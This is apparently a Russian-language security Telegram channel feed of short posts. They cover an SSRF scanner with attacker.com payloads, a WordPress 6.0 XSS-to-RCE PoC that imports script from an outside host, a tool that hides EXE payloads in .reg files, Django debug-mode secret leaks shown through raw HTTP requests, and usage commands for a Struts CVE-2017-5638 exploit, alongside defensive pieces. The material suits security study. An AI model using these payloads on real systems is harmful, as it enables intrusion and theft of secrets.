Forwarded from SHADOW:Group
⚙️ Контекстный SSRF сканер
Инструмент для поиска SSRF, главными особенностями которого является фаззинг наиболее подходящих GET параметров (
Например, для URL:
Ссылка на инструмент
#web #ssrf
Инструмент для поиска SSRF, главными особенностями которого является фаззинг наиболее подходящих GET параметров (
?url=, ?uri=, и тд) и динамическая генерация полезной нагрузки в зависимости от контекста.Например, для URL:
https://host.com/?fileURL=https://authorizedhost.com, инструмент распознает хост authorizedhost.com как потенциально внесенный в белый список и динамически сгенерирует полезные нагрузки на основе этого:http://authorizedhost.attacker.comhttp://authorizedhost%252F@attacker.comи т.д.Ссылка на инструмент
#web #ssrf
👍1
Forwarded from [ Сураба 🦀]
WP 6.0 XSS to RCE PoC
It creates brute.txt file in /wp-content/plugins folder, use it instead of alert(1) in your regular XSS PoC.
import('//X55.is/wp')
Requirements:
1. Admin user logged in + default write permissions;
2. Hello Dolly plugin activated or not (WP default).
It creates brute.txt file in /wp-content/plugins folder, use it instead of alert(1) in your regular XSS PoC.
import('//X55.is/wp')
Requirements:
1. Admin user logged in + default write permissions;
2. Hello Dolly plugin activated or not (WP default).
👍1
Эскалация привилегий в Kubernetes
Когда кто-то говорит о безопасности, в первую очередь имеет ввиду авторизацию и аутентификацию, но в контексте Kubernetes эти две составляющие являются лишь маленькими кусочками большого пазла.
В этой статье вы увидите, как пользователь с ограниченными правами, может повысить свои привилегии и стать админом кластера.
Когда кто-то говорит о безопасности, в первую очередь имеет ввиду авторизацию и аутентификацию, но в контексте Kubernetes эти две составляющие являются лишь маленькими кусочками большого пазла.
В этой статье вы увидите, как пользователь с ограниченными правами, может повысить свои привилегии и стать админом кластера.
👍2🔥1
Встраиваем вирусный exe в файл *.reg
Сравнительно недавно я выпустил экспериментальный проект под названием «EmbedExeLnk» — этот инструмент генерировал файл .lnk, содержащий встроенную полезную нагрузку EXE. Я развил эту концепцию дальше и создал инструмент, который создаёт файл реестра Windows (.reg), содержащий полезную нагрузку EXE.
Сравнительно недавно я выпустил экспериментальный проект под названием «EmbedExeLnk» — этот инструмент генерировал файл .lnk, содержащий встроенную полезную нагрузку EXE. Я развил эту концепцию дальше и создал инструмент, который создаёт файл реестра Windows (.reg), содержащий полезную нагрузку EXE.
👍2
Что, если… забыть про безопасность кластера k8s?
Я думаю, многие слышали про громкий инцидент, произошедший с Tesla в 2018 году, когда группа хакеров через консоль Kubernetes смогла получить доступ к аккаунту. После получения доступа ребята изрядно повеселились, настроив майнер в облачном сервисе Amazon Web Services.
Я думаю, многие слышали про громкий инцидент, произошедший с Tesla в 2018 году, когда группа хакеров через консоль Kubernetes смогла получить доступ к аккаунту. После получения доступа ребята изрядно повеселились, настроив майнер в облачном сервисе Amazon Web Services.
👍1
Forwarded from Кавычка (Bo0oM)
Приложения на Django в debug режиме раскрывают содержимое environment переменных при необработанном исключении.
Несмотря на наличие автоматического сокрытия значений, для переменных соответствующих регулярному выражению
Если обнаружить debug режим можно просто обратившись к несуществующей странице, то вызвать exception иногда бывает проблематично. Даже с раскрытием существующих в приложении путей через 404-ую страницу.
Но существуют и более универсальные подходы.
Пример 1
Нестандартные символы в Host. Правда с учетом облачных сервисов этот вариант срабатывает редко.
Использование большего количества переменных в POST, чем указано в настройке DATA_UPLOAD_MAX_NUMBER_FIELDS (по умолчанию 1000).
Для эксплуатации необходимо найти любой роут, поддерживающий POST запросы, и в редких случаях получить валидное значение CSRF токена на странице.
Несмотря на наличие автоматического сокрытия значений, для переменных соответствующих регулярному выражению
API|TOKEN|KEY|SECRET|PASS|SIGNATURE, часто это приводит к утечкам через нестандартные имена переменных.Если обнаружить debug режим можно просто обратившись к несуществующей странице, то вызвать exception иногда бывает проблематично. Даже с раскрытием существующих в приложении путей через 404-ую страницу.
Но существуют и более универсальные подходы.
Пример 1
Нестандартные символы в Host. Правда с учетом облачных сервисов этот вариант срабатывает редко.
GET / HTTP/1.1Пример 2
Host: '"
Invalid HTTP_HOST header: '\'"'. The domain name provided is not valid according to RFC 1034/1035.
Использование большего количества переменных в POST, чем указано в настройке DATA_UPLOAD_MAX_NUMBER_FIELDS (по умолчанию 1000).
Для эксплуатации необходимо найти любой роут, поддерживающий POST запросы, и в редких случаях получить валидное значение CSRF токена на странице.
POST / HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: csrftoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;
Content-Length: 3093
csrfmiddlewaretoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&x=&x=&x=&x=[..1000 раз..]&x=&x=&x=
👍1
Технология обмана. Что такое Deception и как теперь обманывают хакеров
Ты наверняка слышал про ханипоты — цели-приманки, по атакам на которые вычисляют хакеров. В последние годы эта технология проапгрейдилась и теперь носит общее название Deception. О том, в чем отличия и как хакеров пытаются водить за нос, мы и поговорим.
Слово deception переводится с английского как обман. Это название очень точно отражает суть решения — ведь чтобы поймать атакующего, ловушки должны быть неотличимы от настоящих сервисов.
Ты наверняка слышал про ханипоты — цели-приманки, по атакам на которые вычисляют хакеров. В последние годы эта технология проапгрейдилась и теперь носит общее название Deception. О том, в чем отличия и как хакеров пытаются водить за нос, мы и поговорим.
Слово deception переводится с английского как обман. Это название очень точно отражает суть решения — ведь чтобы поймать атакующего, ловушки должны быть неотличимы от настоящих сервисов.
👍1
Национальная система DNS-спуффинга
12.06.2022 года, в День России, был взломан и “дефейснут” один из сайтов ВГТРК Smotrim[.]ru. Об этом написали несколько СМИ и, на фоне множества дефейсов с 24 февраля, на это никто особого внимания не обратил. Но тут было на что посмотреть с точки зрения того, что именно было взломано.
12.06.2022 года, в День России, был взломан и “дефейснут” один из сайтов ВГТРК Smotrim[.]ru. Об этом написали несколько СМИ и, на фоне множества дефейсов с 24 февраля, на это никто особого внимания не обратил. Но тут было на что посмотреть с точки зрения того, что именно было взломано.
👍1
Обнаружение Ransomware
Многие люди удивлены, узнав, что программы-вымогатели настолько успешны в организациях, где включены все традиционные средства защиты. Большинство организаций, пострадавших от программ-вымогателей, имели современные антивирусы, брандмауэры, фильтрацию контента и все обычные средства защиты, которые, как нам всем говорят, необходимы для успешной защиты от хакеров и вредоносных программ.
Многие люди удивлены, узнав, что программы-вымогатели настолько успешны в организациях, где включены все традиционные средства защиты. Большинство организаций, пострадавших от программ-вымогателей, имели современные антивирусы, брандмауэры, фильтрацию контента и все обычные средства защиты, которые, как нам всем говорят, необходимы для успешной защиты от хакеров и вредоносных программ.
👍1
Web Attack Cheat Sheet
Table of Contents
Table of Contents
Discovering
Targets
IP Enumeration
Subdomain Enumeration
Wayback Machine
Cache
Crawling
Wordlist
Directory Bruteforcing
Parameter Bruteforcing
DNS and HTTP detection
Acquisitions/Names/Addresses/Contacts/Emails/etc.
HTML/JavaScript Comments
Google Dorks
Content Security Policy (CSP)
Tiny URLs Services
GraphQL
General
Enumerating
Fingerprint
Buckets
Cloud Enumeration
Containerization
Visual Identification
Scanning
Static Application Security Testing
Dependency Confusion
Send Emails
Search Vulnerabilities
Web Scanning
HTTP Request Smuggling
Subdomain Takeover
SQLi (SQL Injection)
Repositories Scanning
Secret Scanning
Google Dorks Scanning
CORS Misconfigurations
Monitoring
CVE
Attacking
Brute Force
Exfiltration
General
Manual
Payloads
Bypass
Deserialization
SSRF (Server-Side Request Forgery)
DNS Rebinding
SMTP Header Injection
Reverse Shell
SQLi (SQL Injection)
XPath Injection
LFI (Local File Inclusion)
SSTI (Server Side Template Injection)
WebDAV (Web Distributed Authoring and Versioning)
Generic Tools
General
Trivy
Сканер для поиска уязвимостей в образах контейнеров, файловых системах и репозиториях Git, а также для поиска проблем с конфигурацией и закордкоженных секретов.
Сканер для поиска уязвимостей в образах контейнеров, файловых системах и репозиториях Git, а также для поиска проблем с конфигурацией и закордкоженных секретов.
👍2
Struts PWN
An exploit for Apache Struts CVE-2017-5638.
Использование:
Тестирование одного URL-адреса.
Тестирование списка URL-адресов.
Проверка наличия уязвимости для одного URL-адреса.
Проверка наличия уязвимости по списку URL-адресов.
An exploit for Apache Struts CVE-2017-5638.
Использование:
Тестирование одного URL-адреса.
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'Тестирование списка URL-адресов.
python struts-pwn.py --list 'urls.txt' -c 'id'Проверка наличия уязвимости для одного URL-адреса.
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'Проверка наличия уязвимости по списку URL-адресов.
python struts-pwn.py --check --list 'urls.txt'